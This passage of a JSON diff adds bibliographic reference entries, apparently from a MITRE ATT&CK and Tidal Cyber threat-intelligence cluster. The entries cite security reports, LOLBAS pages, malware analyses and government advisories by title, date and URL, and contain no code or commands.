"TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/" + ], + "source": "Tidal Cyber", + "title": "Ieexec.exe" + }, + "related": [], + "uuid": "91f31525-585d-4b71-83d7-9b7c2feacd34", + "value": "Ieexec.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Ieframe.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Ieframe/" + ], + "source": "Tidal Cyber", + "title": "Ieframe.dll" + }, + "related": [], + "uuid": "aab9c80d-1f1e-47ba-954d-65e7400054df", + "value": "Ieframe.dll - LOLBAS Project" + }, + { + "description": "Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.", + "meta": { + "date_accessed": "2016-04-17T00:00:00Z", + "date_published": "2016-01-26T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Ifconfig" + ], + "source": "MITRE", + "title": "ifconfig" + }, + "related": [], + "uuid": "7bb238d4-4571-4cd0-aab2-76797570724a", + "value": "Wikipedia Ifconfig" + }, + { + "description": "Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.", + "meta": { + "date_accessed": "2018-04-25T00:00:00Z", + "date_published": "2016-08-01T00:00:00Z", + "refs": [ + "https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf" + ], + "source": "MITRE", + "title": "I Got a Letter From the Government the Other Day..." + }, + "related": [], + "uuid": "311a3863-3897-4ddf-a251-d0467a56675f", + "value": "EFF Manul Aug 2016" + }, + { + "description": "Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2011-02-02T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html" + ], + "source": "MITRE", + "title": "IIS Backdoor" + }, + "related": [], + "uuid": "fd450382-cca0-40c4-8144-cc90a3b0011b", + "value": "IIS Backdoor 2011" + }, + { + "description": "Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.", + "meta": { + "date_accessed": "2021-06-17T00:00:00Z", + "date_published": "2007-11-24T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview" + ], + "source": "MITRE", + "title": "IIS Modules Overview" + }, + "related": [], + "uuid": "c8db6bfd-3a08-43b3-b33b-91a32e9bd694", + "value": "Microsoft IIS Modules Overview 2007" + }, + { + "description": "LOLBAS. (2020, March 17). Ilasm.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-03-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/" + ], + "source": "Tidal Cyber", + "title": "Ilasm.exe" + }, + "related": [], + "uuid": "347a1f01-02ce-488e-9100-862971c1833f", + "value": "Ilasm.exe - LOLBAS Project" + }, + { + "description": "Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2019-10-15T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect" + ], + "source": "MITRE", + "title": "Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect" + }, + "related": [], + "uuid": "2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9", + "value": "anomali-rocke-tactics" + }, + { + "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2010-03-24T00:00:00Z", + "refs": [ + "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" + ], + "source": "MITRE", + "title": "Image File Execution Options (IFEO)" + }, + "related": [], + "uuid": "4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2", + "value": "Microsoft Dev Blog IFEO Mar 2010" + }, + { + "description": "LOLBAS. (2020, March 5). IMEWDBLD.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-03-05T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/" + ], + "source": "Tidal Cyber", + "title": "IMEWDBLD.exe" + }, + "related": [], + "uuid": "9d1d6bc1-61cf-4465-b3cb-b6af36769027", + "value": "IMEWDBLD.exe - LOLBAS Project" + }, + { + "description": "Unit 42. (2019, December 2). Imminent Monitor – a RAT Down Under. Retrieved May 5, 2020.", + "meta": { + "date_accessed": "2020-05-05T00:00:00Z", + "date_published": "2019-12-02T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/" + ], + "source": "MITRE", + "title": "Imminent Monitor – a RAT Down Under" + }, + "related": [], + "uuid": "28f858c6-4c00-4c0c-bb27-9e000ba22690", + "value": "Imminent Unit42 Dec2019" + }, + { + "description": "Core Security. (n.d.). Impacket. Retrieved November 2, 2017.", + "meta": { + "date_accessed": "2017-11-02T00:00:00Z", + "refs": [ + "https://www.coresecurity.com/core-labs/open-source-tools/impacket" + ], + "source": "MITRE", + "title": "Impacket" + }, + "related": [], + "uuid": "9b88d7d6-5cf3-40d5-b624-ddf01508cb95", + "value": "Core Security Impacket" + }, + { + "description": "SecureAuth. (n.d.). Retrieved January 15, 2019.", + "meta": { + "date_accessed": "2019-01-15T00:00:00Z", + "refs": [ + "https://www.secureauth.com/labs/open-source-tools/impacket" + ], + "source": "MITRE", + "title": "Impacket Tools" + }, + "related": [], + "uuid": "cdaf72ce-e8f7-42ae-b815-14a7fd47e292", + "value": "Impacket Tools" + }, + { + "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.", + "meta": { + "date_accessed": "2019-01-18T00:00:00Z", + "date_published": "2012-08-07T00:00:00Z", + "refs": [ + "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf" + ], + "source": "MITRE", + "title": "Impeding Automated Malware Analysis with Environment-sensitive Malware" + }, + "related": [], + "uuid": "c3e6c8da-1399-419c-96f5-7dade6fccd29", + "value": "EK Impeding Malware Analysis" + }, + { + "description": "Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.", + "meta": { + "date_accessed": "2023-07-10T00:00:00Z", + "date_published": "2022-09-13T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange" + ], + "source": "MITRE", + "title": "Impersonation and EWS in Exchange" + }, + "related": [], + "uuid": "d7755dbd-0b38-5776-b63a-d792a4d027a4", + "value": "Microsoft Impersonation and EWS in Exchange" + }, + { + "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", + "meta": { + "date_accessed": "2018-01-18T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" + ], + "source": "MITRE", + "title": "Implementing Control Panel Items" + }, + "related": [], + "uuid": "63c5c654-e885-4427-a644-068f4057f35f", + "value": "Microsoft Implementing CPL" + }, + { + "description": "Microsoft. (2016, April 16). Implementing Least-Privilege Administrative Models. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2016-04-16T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/dn487450.aspx" + ], + "source": "MITRE", + "title": "Implementing Least-Privilege Administrative Models" + }, + "related": [], + "uuid": "21e595be-d028-4013-b3d0-811c08581709", + "value": "TechNet Least Privilege" + }, + { + "description": "Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.", + "meta": { + "date_accessed": "2021-01-28T00:00:00Z", + "date_published": "2019-04-10T00:00:00Z", + "refs": [ + "https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + ], + "source": "MITRE", + "title": "Implications of IT Ransomware for ICS Environments" + }, + "related": [], + "uuid": "60187301-8d70-4023-8e6d-59cbb1468f0d", + "value": "Dragos IT ICS Ransomware" + }, + { + "description": "Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2020-12-13T00:00:00Z", + "refs": [ + "https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/" + ], + "source": "MITRE", + "title": "Important steps for customers to protect themselves from recent nation-state cyberattacks" + }, + "related": [], + "uuid": "33e84eb1-4835-404b-8c1a-40695c04cdb4", + "value": "Microsoft SolarWinds Steps" + }, + { + "description": "White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.", + "meta": { + "date_accessed": "2021-04-16T00:00:00Z", + "date_published": "2021-04-15T00:00:00Z", + "refs": [ + "https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/" + ], + "source": "MITRE", + "title": "Imposing Costs for Harmful Foreign Activities by the Russian Government" + }, + "related": [], + "uuid": "c2bf9e2f-cd0a-411d-84bc-61454a369c6b", + "value": "White House Imposing Costs RU Gov April 2021" + }, + { + "description": "Azure Edge and Platform Security Team & Microsoft 365 Defender Research Team. (2021, December 8). Improve kernel security with the new Microsoft Vulnerable and Malicious Driver Reporting Center. Retrieved April 6, 2022.", + "meta": { + "date_accessed": "2022-04-06T00:00:00Z", + "date_published": "2021-12-08T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/" + ], + "source": "MITRE", + "title": "Improve kernel security with the new Microsoft Vulnerable and Malicious Driver Reporting Center" + }, + "related": [], + "uuid": "fde77ea9-2b4d-40d7-99c5-433bfdbcb994", + "value": "Malicious Driver Reporting Center" + }, + { + "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.", + "meta": { + "date_accessed": "2020-05-08T00:00:00Z", + "date_published": "2018-11-05T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Inception Attackers Target Europe with Year-old Office Vulnerability" + }, + "related": [], + "uuid": "5cb98fce-f386-4878-b69c-5c6440ad689c", + "value": "Unit 42 Inception November 2018" + }, + { + "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.", + "meta": { + "date_accessed": "2020-05-08T00:00:00Z", + "date_published": "2018-03-14T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies" + ], + "source": "MITRE, Tidal Cyber", + "title": "Inception Framework: Alive and Well, and Hiding Behind Proxies" + }, + "related": [], + "uuid": "166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3", + "value": "Symantec Inception Framework March 2018" + }, + { + "description": "Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.", + "meta": { + "date_accessed": "2022-04-07T00:00:00Z", + "date_published": "2022-04-05T00:00:00Z", + "refs": [ + "https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/" + ], + "source": "MITRE", + "title": "Incident report: From CLI to console, chasing an attacker in AWS" + }, + "related": [], + "uuid": "089f6f4e-370c-49cb-a35c-c80be0fd39de", + "value": "Expel AWS Attacker" + }, + { + "description": "Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2021-08-05T00:00:00Z", + "refs": [ + "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591" + ], + "source": "MITRE", + "title": "Incident Responders Explore Microsoft 365 Attacks in the Wild" + }, + "related": [], + "uuid": "f26d3aa4-6966-53c4-b9d1-848420377eae", + "value": "Dark Reading Microsoft 365 Attacks 2021" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, July 6). Increased Truebot Activity Infects U.S. and Canada Based Networks. Retrieved July 6, 2023.", + "meta": { + "date_accessed": "2023-07-06T00:00:00Z", + "date_published": "2023-07-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a" + ], + "source": "Tidal Cyber", + "title": "Increased Truebot Activity Infects U.S. and Canada Based Networks" + }, + "related": [], + "uuid": "6f9b8f72-c55f-4268-903e-1f8a82efa5bb", + "value": "U.S. CISA Increased Truebot Activity July 6 2023" + }, + { + "description": "Boelen, M. (2015, October 7). Increase kernel integrity with disabled Linux kernel modules loading. Retrieved June 4, 2020.", + "meta": { + "date_accessed": "2020-06-04T00:00:00Z", + "date_published": "2015-10-07T00:00:00Z", + "refs": [ + "https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/" + ], + "source": "MITRE", + "title": "Increase kernel integrity with disabled Linux kernel modules loading" + }, + "related": [], + "uuid": "23b12551-0bec-4f7d-8468-f372a8ba521b", + "value": "Increasing Linux kernel integrity" + }, + { + "description": "Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2013-05-08T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/dn221960.aspx" + ], + "source": "MITRE", + "title": "Increase scheduling priority" + }, + "related": [], + "uuid": "b785ceda-fea9-4e96-87d8-38cfd1f8b5bd", + "value": "TechNet Scheduling Priority" + }, + { + "description": "Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.", + "meta": { + "date_accessed": "2021-09-30T00:00:00Z", + "date_published": "2021-07-04T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" + ], + "source": "MITRE", + "title": "Independence Day: REvil uses supply chain exploit to attack hundreds of businesses" + }, + "related": [], + "uuid": "d7c4f03e-7dc0-4196-866b-c1a8eb943f77", + "value": "Revil Independence Day" + }, + { + "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-06-28T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html" + ], + "source": "MITRE", + "title": "In-Depth Analysis of A New Variant of .NET Malware AgentTesla" + }, + "related": [], + "uuid": "24e5c321-c418-4010-b158-0ada2dbb4f7f", + "value": "Fortinet Agent Tesla June 2017" + }, + { + "description": "Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.", + "meta": { + "date_accessed": "2020-12-01T00:00:00Z", + "date_published": "2020-06-02T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/" + ], + "source": "MITRE", + "title": "In-depth analysis of the new Team9 malware family" + }, + "related": [], + "uuid": "0ea8f87d-e19d-438d-b05b-30f2ccd0ea3b", + "value": "NCC Group Team9 June 2020" + }, + { + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "meta": { + "date_accessed": "2015-12-02T00:00:00Z", + "date_published": "2013-03-04T00:00:00Z", + "refs": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + ], + "source": "MITRE", + "title": "In-Depth Look: APT Attack Tools of the Trade" + }, + "related": [], + "uuid": "dac5cda3-97bc-4e38-b54f-554a75a18c5b", + "value": "Trend Micro APT Attack Tools" + }, + { + "description": "DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-05-17T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks" + ], + "source": "MITRE", + "title": "Indian organizations targeted in Suckfly attacks" + }, + "related": [], + "uuid": "59fd16cd-426f-472d-a5df-e7c1484a6481", + "value": "Symantec Suckfly May 2016" + }, + { + "description": "FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.", + "meta": { + "date_accessed": "2023-01-11T00:00:00Z", + "date_published": "2022-03-17T00:00:00Z", + "refs": [ + "https://www.ic3.gov/Media/News/2022/220318.pdf" + ], + "source": "MITRE", + "title": "Indicators of Compromise Associated with AvosLocker Ransomware" + }, + "related": [], + "uuid": "8ad57a0d-d74f-5802-ab83-4ddac1beb083", + "value": "Joint CSA AvosLocker Mar 2022" + }, + { + "description": "FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved March 9, 2022.", + "meta": { + "date_accessed": "2022-03-09T00:00:00Z", + "date_published": "2022-01-19T00:00:00Z", + "refs": [ + "https://www.ic3.gov/Media/News/2022/220120.pdf" + ], + "source": "MITRE", + "title": "Indicators of Compromise Associated with Diavol" + }, + "related": [], + "uuid": "a1691741-9ecd-4b20-8cc9-b9bdfc1592b5", + "value": "FBI Flash Diavol January 2022" + }, + { + "description": "FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2020-11-19T00:00:00Z", + "refs": [ + "https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf" + ], + "source": "MITRE", + "title": "Indicators of Compromise Associated with Ragnar Locker Ransomware" + }, + "related": [], + "uuid": "38b9b8a3-6fd3-4650-9192-14ee3f302705", + "value": "FBI Ragnar Locker 2020" + }, + { + "description": "FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.", + "meta": { + "date_accessed": "2020-12-10T00:00:00Z", + "date_published": "2020-09-17T00:00:00Z", + "refs": [ + "https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf" + ], + "source": "MITRE", + "title": "Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07" + }, + "related": [], + "uuid": "76869199-e9fa-41b4-b045-41015e6daaec", + "value": "FBI FLASH APT39 September 2020" + }, + { + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "meta": { + "date_accessed": "2020-10-01T00:00:00Z", + "date_published": "2018-10-03T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/page/file/1098481/download" + ], + "source": "MITRE", + "title": "Indictment - United States vs Aleksei Sergeyevich Morenets, et al." + }, + "related": [], + "uuid": "56aeab4e-b046-4426-81a8-c3b2323492f0", + "value": "US District Court Indictment GRU Oct 2018" + }, + { + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2021-07-01T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + ], + "source": "MITRE, Tidal Cyber", + "title": "IndigoZebra APT continues to attack Central Asia with evolving tools" + }, + "related": [], + "uuid": "cf4a8c8c-eab1-421f-b313-344aed03b42d", + "value": "Checkpoint IndigoZebra July 2021" + }, + { + "description": "Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2021-07-01T00:00:00Z", + "refs": [ + "https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html" + ], + "source": "MITRE", + "title": "IndigoZebra APT Hacking Campaign Targets the Afghan Government" + }, + "related": [], + "uuid": "fcf8265a-3084-4162-87d0-9e77c0a5cff0", + "value": "HackerNews IndigoZebra July 2021" + }, + { + "description": "Check Point Research Team. (2021, August 14). Indra - Hackers Behind Recent Attacks on Iran. Retrieved February 17, 2022.", + "meta": { + "date_accessed": "2022-02-17T00:00:00Z", + "date_published": "2021-08-14T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/" + ], + "source": "MITRE", + "title": "Indra - Hackers Behind Recent Attacks on Iran" + }, + "related": [], + "uuid": "bb79207f-3ab4-4b86-8b1c-d587724efb7c", + "value": "Check Point Meteor Aug 2021" + }, + { + "description": "Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.", + "meta": { + "date_accessed": "2021-09-15T00:00:00Z", + "date_published": "2021-03-17T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/" + ], + "source": "MITRE, Tidal Cyber", + "title": "INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions" + }, + "related": [], + "uuid": "4b77d313-ef3c-4d2f-bfde-609fa59a8f55", + "value": "Crowdstrike EvilCorp March 2021" + }, + { + "description": "ESET. (2022, April 12). Industroyer2: Industroyer reloaded. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2022-04-12T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" + ], + "source": "MITRE", + "title": "Industroyer2: Industroyer reloaded" + }, + "related": [], + "uuid": "3ec01405-3240-5679-924f-f1194bca9a72", + "value": "Industroyer2 ESET April 2022" + }, + { + "description": "Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm's Cyberwarfare Targets Ukraine's Power Grid. Retrieved April 6, 2023.", + "meta": { + "date_accessed": "2023-04-06T00:00:00Z", + "date_published": "2022-08-01T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=xC9iM5wVedQ" + ], + "source": "MITRE", + "title": "Industroyer2: Sandworm's Cyberwarfare Targets Ukraine's Power Grid" + }, + "related": [], + "uuid": "d9e8ca96-8646-5dd9-bede-56305385b2e4", + "value": "Industroyer2 Blackhat ESET" + }, + { + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2022-04-25T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + ], + "source": "MITRE", + "title": "INDUSTROYER.V2: Old Malware Learns New Tricks" + }, + "related": [], + "uuid": "48edeadc-f1e7-5fda-be96-1c41f78fc65a", + "value": "Industroyer2 Mandiant April 2022" + }, + { + "description": "Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.", + "meta": { + "date_accessed": "2018-12-08T00:00:00Z", + "date_published": "2015-01-06T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367" + ], + "source": "MITRE", + "title": "Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies" + }, + "related": [], + "uuid": "52190592-5809-4e7b-a19c-fc87b245025c", + "value": "Sixdub PowerPick Jan 2016" + }, + { + "description": "LOLBAS. (2018, May 25). Infdefaultinstall.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/" + ], + "source": "Tidal Cyber", + "title": "Infdefaultinstall.exe" + }, + "related": [], + "uuid": "5e83d17c-dbdd-4a6c-a395-4f921b68ebec", + "value": "Infdefaultinstall.exe - LOLBAS Project" + }, + { + "description": "Oliveira, A. (2019, May 30). Infected Containers Target Docker via Exposed APIs. Retrieved April 6, 2021.", + "meta": { + "date_accessed": "2021-04-06T00:00:00Z", + "date_published": "2019-05-30T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html" + ], + "source": "MITRE", + "title": "Infected Containers Target Docker via Exposed APIs" + }, + "related": [], + "uuid": "24ae5092-42ea-4c83-bdf7-c0e5026d9559", + "value": "Trend Micro Exposed Docker APIs" + }, + { + "description": "Stokes, P. (2021, November 15). Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma. Retrieved June 30, 2022.", + "meta": { + "date_accessed": "2022-06-30T00:00:00Z", + "date_published": "2021-11-15T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/" + ], + "source": "MITRE", + "title": "Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma" + }, + "related": [], + "uuid": "5033e741-834c-49d6-bc89-f64b9508f8b5", + "value": "SentinelOne MacMa Nov 2021" + }, + { + "description": "Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2003-01-01T00:00:00Z", + "refs": [ + "https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051" + ], + "source": "MITRE", + "title": "Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3)" + }, + "related": [], + "uuid": "616c9177-ca57-45f3-a613-d6450a94697d", + "value": "SANS Information Security Reading Room Securing SNMP Securing SNMP" + }, + { + "description": "Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018.", + "meta": { + "date_accessed": "2018-07-10T00:00:00Z", + "date_published": "2018-04-02T00:00:00Z", + "refs": [ + "https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99" + ], + "source": "MITRE", + "title": "Infostealer.Catchamas" + }, + "related": [], + "uuid": "155cc2df-adf4-4b5f-a377-272947e5757e", + "value": "Symantec Catchamas April 2018" + }, + { + "description": "Caragay, R. (2014, December 11). Info-Stealing File Infector Hits US, UK. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2014-12-11T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/" + ], + "source": "MITRE", + "title": "Info-Stealing File Infector Hits US, UK" + }, + "related": [], + "uuid": "889a21f2-e00b-44c2-aa8c-a33f5615678a", + "value": "TrendMicro Ursnif File Dec 2014" + }, + { + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-12-15T00:00:00Z", + "refs": [ + "https://threatconnect.com/blog/infrastructure-research-hunting/" + ], + "source": "MITRE", + "title": "Infrastructure Research and Hunting: Boiling the Domain Ocean" + }, + "related": [], + "uuid": "96d479df-d312-4af7-a47d-2597a66291f1", + "value": "ThreatConnect Infrastructure Dec 2020" + }, + { + "description": "Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2021-03-22T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man2/init_module.2.html" + ], + "source": "MITRE", + "title": "INIT_MODULE(2)" + }, + "related": [], + "uuid": "ab9c01ad-905e-4f73-b64f-1c6a5fb9a375", + "value": "Init Man Page" + }, + { + "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021.", + "meta": { + "date_accessed": "2021-12-09T00:00:00Z", + "date_published": "2021-12-01T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread" + ], + "source": "MITRE", + "title": "Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors" + }, + "related": [], + "uuid": "8deb6edb-293f-4b9d-882a-541675864eb5", + "value": "Proofpoint RTF Injection" + }, + { + "description": "Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2011-09-06T00:00:00Z", + "refs": [ + "https://www.exploit-db.com/docs/17802.pdf" + ], + 